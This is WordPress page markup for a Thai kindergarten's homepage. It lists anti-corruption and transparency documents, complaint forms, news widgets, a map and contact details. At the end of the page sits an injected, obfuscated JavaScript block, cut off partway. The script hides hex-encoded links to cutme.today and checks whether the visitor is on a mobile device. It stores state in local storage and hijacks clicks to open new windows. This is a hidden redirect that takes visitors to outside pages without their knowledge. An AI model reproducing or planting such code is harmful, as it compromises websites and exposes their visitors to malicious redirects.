href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 